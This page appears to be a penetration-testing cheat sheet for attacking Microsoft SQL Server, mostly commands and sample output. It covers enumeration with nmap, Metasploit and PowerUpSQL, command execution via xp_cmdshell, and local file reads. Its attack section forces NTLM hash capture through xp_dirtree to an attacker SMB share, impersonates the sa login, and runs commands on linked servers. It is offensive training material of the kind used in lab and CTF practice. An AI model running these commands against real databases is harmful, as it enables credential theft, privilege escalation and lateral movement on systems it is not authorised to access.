DiscordHackTheBoxTryHackMeGitHub

MSSQL

ABOUT

Microsoft SQL (MSSQL) is Microsoft's SQL-based relational database management system. It is popular among database administrators and developers when building applications that run on Microsoft's .NET framework due to its strong native support for .NET. MSSQL have a lot of different targets. Default port is 1433 and 1434. More about MSSQL Hacking you could read here [LINK]

Authentication Mods

MSSQL have 2 authentication mods: windows authentication mode (default) and mixed. Windows authentication mode is often referred as integrated because of high integration with AD and Windows. With this you could authenticate into database automatically if you have right user or member of right group. Mixed mode is supporting both AD/Windows authentication and SQL one. If we are specifying domain, it'll use Windows auth, if we don't specify domain, it'll use SQL auth. We should use servername\\accountname for domain specification.

Databases

MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

Database
Description

master

Tracks all system information for an SQL server instance

model

Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database

msdb

The SQL Server Agent uses this database to schedule jobs & alerts

tempdb

Stores temporary objects

resource

Read-only database containing system objects included with SQL server

MSSQL Useful Commands

HackTricks: [LINK]

Command
Description

impacket-mssqlclient carni17@13.13.13.13

Connect to the MSSQL server.

SELECT name FROM master.dbo.sysdatabases;

Show all databases

use <database>;

Select one of the existing databases

SELECT * FROM databasename.INFORMATION_SCHEMA.TABLES;

Show all available tables in the selected database

select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;

List users

select * from <table>;

Show everything in the desired table

xp_cmdshell 'whoami'

NOT DEFAULT. System command execution via MSSQL

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

NOT DEFAULT. Reading local files

CMD Interacting

Linux

sqsh -S 13.13.13.13 -U venator17 -P 'superkek' -h
# We need to use GO for command executon and use each line for each part of command which start with verb
sqsh -S 13.13.13.13 -U MILITECH\\venator17 -P 'superkek' -h 
# or we could use "." if we don't know domain name
impacket-mssqlclient MILITECH/ADMINISTRATOR@13.13.13.13 -windows-auth

Windows

sqlcmd -S 13.13.13.13 -U venator17 -P superkek123
sqlcmd #If you are already in system
# We need to use GO for command executon and use each line for each part of command which start with verb

ENUM

Nmap Scan

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 13.13.13.13

Metasploit Scan

We can use mssql_ping to get more useful info about MSSQL server.

msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 13.13.13.13

rhosts => 13.13.13.13

msf6 auxiliary(scanner/mssql/mssql_ping) > run

[*] 13.13.13.13:       - SQL Server information for 13.13.13.13:
[+] 13.13.13.13:       -    ServerName      = SQL-01
[+] 13.13.13.13:       -    InstanceName    = MSSQLSERVER
[+] 13.13.13.13:       -    IsClustered     = No
[+] 13.13.13.13:       -    Version         = 15.0.2000.5
[+] 13.13.13.13:       -    tcp             = 1433
[+] 13.13.13.13:       -    np              = \\SQL-01\pipe\sql\query
[*] 13.13.13.13:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

PowerUpSQL

PowerUpSQL [LINK] is a SQL exploiting tool, which helps attack, enumeration etc.

PS C:\> Import-Module .\PowerUpSQL.ps1
PS C:\> Get-SQLInstanceDomain

Login

PS C:\> Get-SQLQuery -Verbose -Instance "13.13.13.13,1433" -username "militech\sreed" -password "password123" -query 'Select @@version'

ATTACKS

Capture MSSQL Service Hash

EXEC master..xp_dirtree '\\13.13.13.13\amogus\'
OR
EXEC master..xp_subdirs '\\13.13.13.13\amogus\'
# Then use Responder or impacket-smbclient to make a fake server and intercept hash

Impersonating other users

  1. Check what users can be impersonated

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO

  1. Check current role and user

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

  1. Impersonating sa user

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

Check linked server

  1. Identify linked Servers

SELECT srvname, isremote FROM sysservers
GO

There would be a server list, those with "1" is remote, those with "0" is linked.

  1. Check rights

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [13.13.13.13\LINKEDSERVER]
GO

  1. Execute commands at linked server

EXECUTE('') AT [13.13.13.13\LINKEDSERVER]
GO

If you have quotes in command, use double singe quotes for it (''example'')

PreviousMySQLNextOracle TNS

Last updated